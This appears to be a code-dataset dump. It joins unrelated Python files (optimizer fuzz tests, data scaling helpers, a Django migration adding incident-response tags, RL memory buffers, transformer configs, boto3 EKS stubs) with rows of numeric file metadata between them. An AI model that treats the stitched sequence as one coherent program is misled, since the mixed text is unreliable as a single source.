import hypothesis.extra.numpy as npst import unittest from hypothesis import given, strategies as st from cmaes import CMA, SepCMA class TestFuzzing(unittest.TestCase): @given( data=st.data(), ) def test_cma_tell(self, data): dim = data.draw(st.integers(min_value=2, max_value=100)) mean = data.draw(npst.arrays(dtype=float, shape=dim)) sigma = data.draw(st.floats(min_value=1e-16)) n_iterations = data.draw(st.integers(min_value=1)) try: optimizer = CMA(mean, sigma) except AssertionError: return popsize = optimizer.population_size for _ in range(n_iterations): tell_solutions = data.draw( st.lists( st.tuples(npst.arrays(dtype=float, shape=dim), st.floats()), min_size=popsize, max_size=popsize, ) ) optimizer.ask() try: optimizer.tell(tell_solutions) except AssertionError: return optimizer.ask() @given( data=st.data(), ) def test_sepcma_tell(self, data): dim = data.draw(st.integers(min_value=2, max_value=100)) mean = data.draw(npst.arrays(dtype=float, shape=dim)) sigma = data.draw(st.floats(min_value=1e-16)) n_iterations = data.draw(st.integers(min_value=1)) try: optimizer = SepCMA(mean, sigma) except AssertionError: return popsize = optimizer.population_size for _ in range(n_iterations): tell_solutions = data.draw( st.lists( st.tuples(npst.arrays(dtype=float, shape=dim), st.floats()), min_size=popsize, max_size=popsize, ) ) optimizer.ask() try: optimizer.tell(tell_solutions) except AssertionError: return optimizer.ask()
32.046875
80
0.542662
222
2,051
4.887387
0.256757
0.073733
0.073733
0.066359
0.853456
0.853456
0.812903
0.812903
0.812903
0.812903
0
0.012186
0.359824
2,051
63
81
32.555556
0.814166
0
0
0.745763
0
0
0
0
0
0
0
0
0.067797
1
0.033898
false
0
0.067797
0
0.186441
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
a569d1530bd7c7f7425be21e8084b5c7a174d752
59
py
Python
agents/new_agent/__init__.py
pmkumar1308/Connect4_PCP2021
a9ad8a4c3f5eed7b7ddabe2a41446b5e34541b84
[ "MIT" ]
null
null
null
agents/new_agent/__init__.py
pmkumar1308/Connect4_PCP2021
a9ad8a4c3f5eed7b7ddabe2a41446b5e34541b84
[ "MIT" ]
null
null
null
agents/new_agent/__init__.py
pmkumar1308/Connect4_PCP2021
a9ad8a4c3f5eed7b7ddabe2a41446b5e34541b84
[ "MIT" ]
null
null
null
from .mcts_agent import generate_move_mcts as gen_move_mcts
59
59
0.898305
11
59
4.363636
0.727273
0.333333
0
0
0
0
0
0
0
0
0
0
0.084746
59
1
59
59
0.888889
0
0
0
1
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
3c0e12e202474c0153b7101e4b983b6ea64e2968
2,804
py
Python
msap/modeling/model_selection/preprocessing/scale.py
asmyoo/MSAP
0ed89f90d67260892a8c4d945504f3b0a2096d36
[ "MIT" ]
null
null
null
msap/modeling/model_selection/preprocessing/scale.py
asmyoo/MSAP
0ed89f90d67260892a8c4d945504f3b0a2096d36
[ "MIT" ]
null
null
null
msap/modeling/model_selection/preprocessing/scale.py
asmyoo/MSAP
0ed89f90d67260892a8c4d945504f3b0a2096d36
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """Scaling methods. Authors: Fangzhou Li - fzli@ucdavis.edu """ from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler import pandas as pd def standardize(X_df, cat_vars): """Apply the standardize the input data. Args: X_df (pd.DataFrame): Input data. cat_vars (List) : Indices of columns that are categorical Returns: (pd.DataFrame): Scaled data. """ if cat_vars is None: X_array = X_df.to_numpy() scaler = StandardScaler().fit(X_array) return pd.DataFrame( scaler.transform(X_array), index=X_df.index, columns=X_df.columns) else: X_scalar = X_df.drop(X_df.iloc[:, cat_vars], axis=1) X_array = X_scalar.to_numpy() scaler = StandardScaler().fit(X_array) scaled = pd.DataFrame( scaler.transform(X_array), index=X_scalar.index, columns=X_scalar.columns) return pd.concat([scaled, X_df.iloc[:, cat_vars]], axis=1) def minmax_normalize(X_df, cat_vars): """Apply the MinMax normalization the input data. Args: X_df (pd.DataFrame): Input data. cat_vars (List) : Indices of columns that are categorical Returns: (pd.DataFrame): Scaled data. """ if cat_vars is None: X_array = X_df.to_numpy() scaler = MinMaxScaler().fit(X_array) return pd.DataFrame( scaler.transform(X_array), index=X_df.index, columns=X_df.columns) else: X_scalar = X_df.drop(X_df.iloc[:, cat_vars], axis=1) X_array = X_scalar.to_numpy() scaler = MinMaxScaler().fit(X_array) scaled = pd.DataFrame( scaler.transform(X_array), index=X_scalar.index, columns=X_scalar.columns) return pd.concat([scaled, X_df.iloc[:, cat_vars]], axis=1) def robust_normalize(X_df, cat_vars): """Apply the robust normalization the input data. Args: X_df (pd.DataFrame): Input data. cat_vars (List) : Indices of columns that are categorical Returns: (pd.DataFrame): Scaled data. """ if cat_vars is None: X_array = X_df.to_numpy() scaler = RobustScaler().fit(X_array) return pd.DataFrame( scaler.transform(X_array), index=X_df.index, columns=X_df.columns) else: X_scalar = X_df.drop(X_df.iloc[:, cat_vars], axis=1) X_array = X_scalar.to_numpy() scaler = RobustScaler().fit(X_array) scaled = pd.DataFrame( scaler.transform(X_array), index=X_scalar.index, columns=X_scalar.columns) return pd.concat([scaled, X_df.iloc[:, cat_vars]], axis=1)
26.205607
76
0.600571
368
2,804
4.366848
0.173913
0.044804
0.026136
0.097075
0.883012
0.883012
0.871811
0.790915
0.790915
0.790915
0
0.003504
0.287447
2,804
106
77
26.45283
0.800801
0.236448
0
0.90566
0
0
0
0
0
0
0
0
0
1
0.056604
false
0
0.037736
0
0.207547
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
b1bc10f526fb41ab54c9d50f2013344d522a2b04
1,177
py
Python
dfirtrack_main/migrations/0003_default_tags.py
0xflotus/dfirtrack
632ebe582c2b40a4ac4b9fb12b7a118c2c49ede5
[ "MIT" ]
4
2018-11-13T14:42:20.000Z
2020-01-20T02:31:26.000Z
dfirtrack_main/migrations/0003_default_tags.py
0xflotus/dfirtrack
632ebe582c2b40a4ac4b9fb12b7a118c2c49ede5
[ "MIT" ]
2
2022-02-28T03:40:31.000Z
2022-02-28T03:40:52.000Z
dfirtrack_main/migrations/0003_default_tags.py
0xflotus/dfirtrack
632ebe582c2b40a4ac4b9fb12b7a118c2c49ede5
[ "MIT" ]
2
2022-02-25T08:34:51.000Z
2022-03-16T17:29:44.000Z
# Generated by Django 2.0.2 on 2018-03-20 16:45 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('dfirtrack_main', '0002_default_values'), ] operations = [ migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Suspicious', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='orange'));"), migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Backdoor installed', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='red'));"), migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Credential harvesting', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='red'));"), migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Data theft', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='red'));"), migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Important', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='red'));"), ]
53.5
195
0.75446
151
1,177
5.596026
0.284768
0.169231
0.130178
0.153846
0.742012
0.742012
0.742012
0.742012
0.742012
0.742012
0
0.018756
0.139337
1,177
21
196
56.047619
0.8154
0.038233
0
0
1
0.416667
0.729204
0.20177
0
0
0
0
0
1
0
false
0
0.166667
0
0.416667
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
a7106f32824e2aa0bdf07195ba2a6d0587fad6ce
6,304
py
Python
src/gridworld_trainer/reinforce/memory.py
Frederik-L/evaluating-population-based-reinforcement-learning-for-transfer-learning
474a927155a0028d55c4176808aff30f9b5ae97d
[ "MIT" ]
null
null
null
src/gridworld_trainer/reinforce/memory.py
Frederik-L/evaluating-population-based-reinforcement-learning-for-transfer-learning
474a927155a0028d55c4176808aff30f9b5ae97d
[ "MIT" ]
null
null
null
src/gridworld_trainer/reinforce/memory.py
Frederik-L/evaluating-population-based-reinforcement-learning-for-transfer-learning
474a927155a0028d55c4176808aff30f9b5ae97d
[ "MIT" ]
null
null
null
# @title: memory.py # @author: Jan Frederik Liebig # @date: 02.09.2021 ############################################################ # Imports from torch.utils.data.sampler import BatchSampler, SubsetRandomSampler import torch ############################################################ # Code class MemoryReinforce: def __init__(self, rollout_size, obs_size_x, obs_size_y, obs_channel, device): """ Initializes the memory for the reinforce algorithm for 2d stacked frames and single frame type @params rollout_size the maximum rollout size obs_size_x the x size of the observation obs_size_y the y size of the observation obs_channel the number of channels in the observation device the device used in the models """ self.rollout_size = rollout_size self.obs_size_x = obs_size_x self.obs_size_y = obs_size_y self.obs_channel = obs_channel self.device = device self.reset() def insert(self, step, done, action, log_prob, reward, obs): """ Inserts new data in the memory @params: step the current step done true if the state is terminal action the used action log_prob the logarithmic probability of the action reward the received reward obs the observation to insert """ self.done[step].copy_(done) self.actions[step].copy_(action) self.log_probs[step].copy_(log_prob) self.rewards[step].copy_(reward) self.obs[step].copy_(obs) self.obs[step] = self.obs[step].to(self.device) def reset(self): """ Resets the memory """ self.done = torch.zeros(self.rollout_size, 1) self.returns = torch.zeros(self.rollout_size + 1, 1, requires_grad=False) self.actions = torch.zeros(self.rollout_size, 1, dtype=torch.int64) self.log_probs = torch.zeros(self.rollout_size, 1) self.rewards = torch.zeros(self.rollout_size, 1) self.obs = torch.zeros( self.rollout_size, self.obs_channel, self.obs_size_x, self.obs_size_y ) self.obs = self.obs.to(self.device) def compute_returns(self, gamma): """ Computes the returns for each episode @params: gamma the discount factor """ self.last_done = (self.done == 1).nonzero().max() self.returns[self.last_done + 1] = 0.0 for step in reversed(range(self.last_done + 1)): self.returns[step] = ( self.returns[step + 1] * gamma * (1 - self.done[step]) + self.rewards[step] ) def batch_sampler(self, batch_size): """ Samples a batch with the data @params: batch_size the size of the requested batch """ sampler = BatchSampler( SubsetRandomSampler(range(self.last_done)), batch_size, drop_last=True ) for indices in sampler: yield self.actions[indices], self.returns[indices], self.obs[indices] class MemoryReinforce3D: def __init__( self, rollout_size, obs_size_x, obs_size_y, obs_size_z, obs_channel, device ): """ Initializes the memory for the reinforce algorithm for 3d stacked frames @params rollout_size the maximum rollout size obs_size_x the x size of the observation obs_size_y the y size of the observation obs_size_z the z size of the observation obs_channel the number of channels in the observation device the device used in the models """ self.rollout_size = rollout_size self.obs_size_x = obs_size_x self.obs_size_y = obs_size_y self.obs_size_z = obs_size_z self.obs_channel = obs_channel self.device = device self.reset() def insert(self, step, done, action, log_prob, reward, obs): """ Inserts new data in the memory @params: step the current step done true if the state is terminal action the used action log_prob the logarithmic probability of the action reward the received reward obs the observation to insert """ self.done[step].copy_(done) self.actions[step].copy_(action) self.log_probs[step].copy_(log_prob) self.rewards[step].copy_(reward) self.obs[step].copy_(obs) self.obs[step] = self.obs[step].to(self.device) def reset(self): """ Resets the memory """ self.done = torch.zeros(self.rollout_size, 1) self.returns = torch.zeros(self.rollout_size + 1, 1, requires_grad=False) self.actions = torch.zeros(self.rollout_size, 1, dtype=torch.int64) self.log_probs = torch.zeros(self.rollout_size, 1) self.rewards = torch.zeros(self.rollout_size, 1) self.obs = torch.zeros( self.rollout_size, self.obs_channel, self.obs_size_z, self.obs_size_x, self.obs_size_y, ) self.obs = self.obs.to(self.device) def compute_returns(self, gamma): """ Computes the returns for each episode @params: gamma the discount factor """ self.last_done = (self.done == 1).nonzero().max() self.returns[self.last_done + 1] = 0.0 for step in reversed(range(self.last_done + 1)): self.returns[step] = ( self.returns[step + 1] * gamma * (1 - self.done[step]) + self.rewards[step] ) def batch_sampler(self, batch_size): """ Samples a batch with the data @params: batch_size the size of the requested batch """ sampler = BatchSampler( SubsetRandomSampler(range(self.last_done)), batch_size, drop_last=True ) for indices in sampler: yield self.actions[indices], self.returns[indices], self.obs[indices]
35.818182
102
0.573604
778
6,304
4.48072
0.142674
0.056225
0.068847
0.072289
0.933161
0.929432
0.928285
0.928285
0.928285
0.928285
0
0.009615
0.323604
6,304
175
103
36.022857
0.807927
0.281885
0
0.758621
0
0
0
0
0
0
0
0
0
1
0.114943
false
0
0.022989
0
0.16092
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
597c0be9050aedf8c865e321505d43e678daa97b
2,393
py
Python
TorchFly/torchfly/nn/transformers/model_configs.py
mrazizi/TextGAIL
9b6e0e62669e0bd4fbb1a8b64098c8432b0d725d
[ "MIT" ]
19
2020-05-16T23:13:43.000Z
2022-03-08T15:01:48.000Z
TorchFly/torchfly/nn/transformers/model_configs.py
MarkusSagen/TextGAIL
18ba72c6d63c3c3db1f195d118267c6e8243b4ff
[ "MIT" ]
3
2021-06-08T21:07:12.000Z
2021-12-13T20:41:53.000Z
TorchFly/torchfly/nn/transformers/model_configs.py
MarkusSagen/TextGAIL
18ba72c6d63c3c3db1f195d118267c6e8243b4ff
[ "MIT" ]
10
2020-06-09T09:15:14.000Z
2022-03-20T09:36:30.000Z
import torch class ChineseBERTBaseConfig: attention_dropout_prob = 0.1 hidden_dropout_prob = 0.1 hidden_size = 768 num_attention_heads = 12 num_hidden_layers = 12 intermediate_size = 3072 layer_norm_eps = 1e-05 max_position_embeddings = 512 vocab_size = 21128 type_vocab_size = 2 class UnifiedRobertaBaseConfig: attention_dropout_prob = 0.1 hidden_dropout_prob = 0.1 hidden_size = 768 num_attention_heads = 12 num_hidden_layers = 12 intermediate_size = 3072 layer_norm_eps = 1e-05 max_position_embeddings = 514 # potentially remove it output_attentions = False output_hidden_states = False vocab_size = 50265 padding_idx = 1 type_vocab_size = 1 padding_value = 1 class UnifiedGPT2MediumConfig: vocab_size = 50265 n_positions = 1024 n_ctx = 1024 n_embd = 1024 n_layer = 24 n_head = 16 resid_pdrop = 0.1 embd_pdrop = 0.1 attn_pdrop = 0.1 layer_norm_epsilon = 1e-5 initializer_range = 0.02 gradient_checkpointing = True padding_value = 1 class UnifiedGPT2SmallConfig: vocab_size = 50265 n_positions = 1024 n_ctx = 1024 n_embd = 768 n_layer = 12 n_head = 12 resid_pdrop = 0.1 embd_pdrop = 0.1 attn_pdrop = 0.1 layer_norm_epsilon = 1e-5 initializer_range = 0.02 gradient_checkpointing = False padding_value = 1 class UnifiedGPT2LargeConfig: vocab_size = 50265 n_positions = 1024 n_ctx = 1024 n_embd = 1280 n_layer = 36 n_head = 20 resid_pdrop = 0.1 embd_pdrop = 0.1 attn_pdrop = 0.1 layer_norm_epsilon = 1e-5 initializer_range = 0.02 gradient_checkpointing = True padding_value = 1 class UnifiedGPT2XLConfig: vocab_size = 50265 n_positions = 1024 n_ctx = 1024 n_embd = 1600 n_layer = 48 n_head = 25 resid_pdrop = 0.1 embd_pdrop = 0.1 attn_pdrop = 0.1 layer_norm_epsilon = 1e-5 initializer_range = 0.02 gradient_checkpointing = True padding_value = 1 class UnifiedGPT2DistillConfig: vocab_size = 50265 n_positions = 1024 n_ctx = 1024 n_embd = 768 n_layer = 6 n_head = 12 resid_pdrop = 0.1 embd_pdrop = 0.1 attn_pdrop = 0.1 layer_norm_epsilon = 1e-5 initializer_range = 0.02 gradient_checkpointing = True padding_value = 1
22.157407
34
0.669035
337
2,393
4.4273
0.222552
0.025469
0.070375
0.060322
0.72319
0.72319
0.72319
0.72319
0.72319
0.72319
0
0.128976
0.277476
2,393
107
35
22.364486
0.73395
0.008776
0
0.71134
0
0
0
0
0
0
0
0
0
1
0
false
0
0.010309
0
1
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
7
59c98367bed11fb50c56115c7b7363396d14a2c6
545
py
Python
eval_mosmed_timm-regnetx_002_PiecewiseAffine.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
eval_mosmed_timm-regnetx_002_PiecewiseAffine.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
eval_mosmed_timm-regnetx_002_PiecewiseAffine.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
import os ls=["python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_0_PiecewiseAffine.yml", "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_1_PiecewiseAffine.yml", "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_2_PiecewiseAffine.yml", "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_3_PiecewiseAffine.yml", "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_4_PiecewiseAffine.yml", ] for l in ls: os.system(l)
49.545455
103
0.847706
80
545
5.4
0.3
0.115741
0.138889
0.219907
0.884259
0.884259
0.884259
0.884259
0.884259
0.884259
0
0.038911
0.056881
545
11
104
49.545455
0.801556
0
0
0
0
0
0.879121
0.650183
0
0
0
0
0
1
0
false
0
0.111111
0
0.111111
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
ab6884debfde7f8228e6d1ee6e45544b238042ad
56,059
py
Python
boto3_type_annotations_with_docs/boto3_type_annotations/eks/client.py
cowboygneox/boto3_type_annotations
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
[ "MIT" ]
119
2018-12-01T18:20:57.000Z
2022-02-02T10:31:29.000Z
boto3_type_annotations_with_docs/boto3_type_annotations/eks/client.py
cowboygneox/boto3_type_annotations
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
[ "MIT" ]
15
2018-11-16T00:16:44.000Z
2021-11-13T03:44:18.000Z
boto3_type_annotations_with_docs/boto3_type_annotations/eks/client.py
cowboygneox/boto3_type_annotations
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
[ "MIT" ]
11
2019-05-06T05:26:51.000Z
2021-09-28T15:27:59.000Z
from typing import Optional from botocore.client import BaseClient from botocore.waiter import Waiter from typing import Union from typing import Dict from botocore.paginate import Paginator class Client(BaseClient): def can_paginate(self, operation_name: str = None): """ Check if an operation can be paginated. :type operation_name: string :param operation_name: The operation name. This is the same name as the method name on the client. For example, if the method name is ``create_foo``, and you\'d normally invoke the operation as ``client.create_foo(**kwargs)``, if the ``create_foo`` operation can be paginated, you can use the call ``client.get_paginator(\"create_foo\")``. :return: ``True`` if the operation can be paginated, ``False`` otherwise. """ pass def create_cluster(self, name: str, roleArn: str, resourcesVpcConfig: Dict, version: str = None, logging: Dict = None, clientRequestToken: str = None) -> Dict: """ Creates an Amazon EKS control plane. The Amazon EKS control plane consists of control plane instances that run the Kubernetes software, like ``etcd`` and the API server. The control plane runs in an account managed by AWS, and the Kubernetes API is exposed via the Amazon EKS API server endpoint. Each Amazon EKS cluster control plane is single-tenant and unique, and runs on its own set of Amazon EC2 instances. The cluster control plane is provisioned across multiple Availability Zones and fronted by an Elastic Load Balancing Network Load Balancer. Amazon EKS also provisions elastic network interfaces in your VPC subnets to provide connectivity from the control plane instances to the worker nodes (for example, to support ``kubectl exec`` , ``logs`` , and ``proxy`` data flows). Amazon EKS worker nodes run in your AWS account and connect to your cluster's control plane via the Kubernetes API server endpoint and a certificate file that is created for your cluster. You can use the ``endpointPublicAccess`` and ``endpointPrivateAccess`` parameters to enable or disable public and private access to your cluster's Kubernetes API server endpoint. By default, public access is enabled and private access is disabled. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . You can use the ``logging`` parameter to enable or disable exporting the Kubernetes control plane logs for your cluster to CloudWatch Logs. By default, cluster control plane logs are not exported to CloudWatch Logs. For more information, see `Amazon EKS Cluster Control Plane Logs <https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html>`__ in the * *Amazon EKS User Guide* * . .. note:: CloudWatch Logs ingestion, archive storage, and data scanning rates apply to exported control plane logs. For more information, see `Amazon CloudWatch Pricing <http://aws.amazon.com/cloudwatch/pricing/>`__ . Cluster creation typically takes between 10 and 15 minutes. After you create an Amazon EKS cluster, you must configure your Kubernetes tooling to communicate with the API server and launch worker nodes into your cluster. For more information, see `Managing Cluster Authentication <https://docs.aws.amazon.com/eks/latest/userguide/managing-auth.html>`__ and `Launching Amazon EKS Worker Nodes <https://docs.aws.amazon.com/eks/latest/userguide/launch-workers.html>`__ in the *Amazon EKS User Guide* . See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/CreateCluster>`_ **Request Syntax** :: response = client.create_cluster( name='string', version='string', roleArn='string', resourcesVpcConfig={ 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, logging={ 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, clientRequestToken='string' ) **Response Syntax** :: { 'cluster': { 'name': 'string', 'arn': 'string', 'createdAt': datetime(2015, 1, 1), 'version': 'string', 'endpoint': 'string', 'roleArn': 'string', 'resourcesVpcConfig': { 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'vpcId': 'string', 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, 'logging': { 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, 'status': 'CREATING'|'ACTIVE'|'DELETING'|'FAILED', 'certificateAuthority': { 'data': 'string' }, 'clientRequestToken': 'string', 'platformVersion': 'string' } } **Response Structure** - *(dict) --* - **cluster** *(dict) --* The full description of your new cluster. - **name** *(string) --* The name of the cluster. - **arn** *(string) --* The Amazon Resource Name (ARN) of the cluster. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the cluster was created. - **version** *(string) --* The Kubernetes server version for the cluster. - **endpoint** *(string) --* The endpoint for your Kubernetes API server. - **roleArn** *(string) --* The Amazon Resource Name (ARN) of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf. - **resourcesVpcConfig** *(dict) --* The VPC configuration used by the cluster control plane. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see `Cluster VPC Considerations <https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html>`__ and `Cluster Security Group Considerations <https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html>`__ in the *Amazon EKS User Guide* . - **subnetIds** *(list) --* The subnets associated with your cluster. - *(string) --* - **securityGroupIds** *(list) --* The security groups associated with the cross-account elastic network interfaces that are used to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **vpcId** *(string) --* The VPC associated with your cluster. - **endpointPublicAccess** *(boolean) --* This parameter indicates whether the Amazon EKS public API server endpoint is enabled. If the Amazon EKS public API server endpoint is disabled, your cluster's Kubernetes API server can only receive requests that originate from within the cluster VPC. - **endpointPrivateAccess** *(boolean) --* This parameter indicates whether the Amazon EKS private API server endpoint is enabled. If the Amazon EKS private API server endpoint is enabled, Kubernetes API requests that originate from within your cluster's VPC will use the private VPC endpoint instead of traversing the internet. - **logging** *(dict) --* The logging configuration for your cluster. - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. - **status** *(string) --* The current status of the cluster. - **certificateAuthority** *(dict) --* The ``certificate-authority-data`` for your cluster. - **data** *(string) --* The base64 encoded certificate data required to communicate with your cluster. Add this to the ``certificate-authority-data`` section of the ``kubeconfig`` file for your cluster. - **clientRequestToken** *(string) --* Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. - **platformVersion** *(string) --* The platform version of your Amazon EKS cluster. For more information, see `Platform Versions <https://docs.aws.amazon.com/eks/latest/userguide/platform-versions.html>`__ in the * *Amazon EKS User Guide* * . :type name: string :param name: **[REQUIRED]** The unique name to give to your cluster. :type version: string :param version: The desired Kubernetes version for your cluster. If you do not specify a value here, the latest version available in Amazon EKS is used. :type roleArn: string :param roleArn: **[REQUIRED]** The Amazon Resource Name (ARN) of the IAM role that provides permissions for Amazon EKS to make calls to other AWS API operations on your behalf. For more information, see `Amazon EKS Service IAM Role <https://docs.aws.amazon.com/eks/latest/userguide/service_IAM_role.html>`__ in the * *Amazon EKS User Guide* * . :type resourcesVpcConfig: dict :param resourcesVpcConfig: **[REQUIRED]** The VPC configuration used by the cluster control plane. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see `Cluster VPC Considerations <https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html>`__ and `Cluster Security Group Considerations <https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html>`__ in the *Amazon EKS User Guide* . You must specify at least two subnets. You may specify up to five security groups, but we recommend that you use a dedicated security group for your cluster control plane. - **subnetIds** *(list) --* Specify subnets for your Amazon EKS worker nodes. Amazon EKS creates cross-account elastic network interfaces in these subnets to allow communication between your worker nodes and the Kubernetes control plane. - *(string) --* - **securityGroupIds** *(list) --* Specify one or more security groups for the cross-account elastic network interfaces that Amazon EKS creates to use to allow communication between your worker nodes and the Kubernetes control plane. If you do not specify a security group, the default security group for your VPC is used. - *(string) --* - **endpointPublicAccess** *(boolean) --* Set this value to ``false`` to disable public access for your cluster\'s Kubernetes API server endpoint. If you disable public access, your cluster\'s Kubernetes API server can only receive requests from within the cluster VPC. The default value for this parameter is ``true`` , which enables public access for your Kubernetes API server. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . - **endpointPrivateAccess** *(boolean) --* Set this value to ``true`` to enable private access for your cluster\'s Kubernetes API server endpoint. If you enable private access, Kubernetes API requests from within your cluster\'s VPC will use the private VPC endpoint. The default value for this parameter is ``false`` , which disables private access for your Kubernetes API server. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . :type logging: dict :param logging: Enable or disable exporting the Kubernetes control plane logs for your cluster to CloudWatch Logs. By default, cluster control plane logs are not exported to CloudWatch Logs. For more information, see `Amazon EKS Cluster Control Plane Logs <https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html>`__ in the * *Amazon EKS User Guide* * . .. note:: CloudWatch Logs ingestion, archive storage, and data scanning rates apply to exported control plane logs. For more information, see `Amazon CloudWatch Pricing <http://aws.amazon.com/cloudwatch/pricing/>`__ . - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. :type clientRequestToken: string :param clientRequestToken: Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. This field is autopopulated if not provided. :rtype: dict :returns: """ pass def delete_cluster(self, name: str) -> Dict: """ Deletes the Amazon EKS cluster control plane. .. note:: If you have active services in your cluster that are associated with a load balancer, you must delete those services before deleting the cluster so that the load balancers are deleted properly. Otherwise, you can have orphaned resources in your VPC that prevent you from being able to delete the VPC. For more information, see `Deleting a Cluster <https://docs.aws.amazon.com/eks/latest/userguide/delete-cluster.html>`__ in the *Amazon EKS User Guide* . See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/DeleteCluster>`_ **Request Syntax** :: response = client.delete_cluster( name='string' ) **Response Syntax** :: { 'cluster': { 'name': 'string', 'arn': 'string', 'createdAt': datetime(2015, 1, 1), 'version': 'string', 'endpoint': 'string', 'roleArn': 'string', 'resourcesVpcConfig': { 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'vpcId': 'string', 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, 'logging': { 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, 'status': 'CREATING'|'ACTIVE'|'DELETING'|'FAILED', 'certificateAuthority': { 'data': 'string' }, 'clientRequestToken': 'string', 'platformVersion': 'string' } } **Response Structure** - *(dict) --* - **cluster** *(dict) --* The full description of the cluster to delete. - **name** *(string) --* The name of the cluster. - **arn** *(string) --* The Amazon Resource Name (ARN) of the cluster. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the 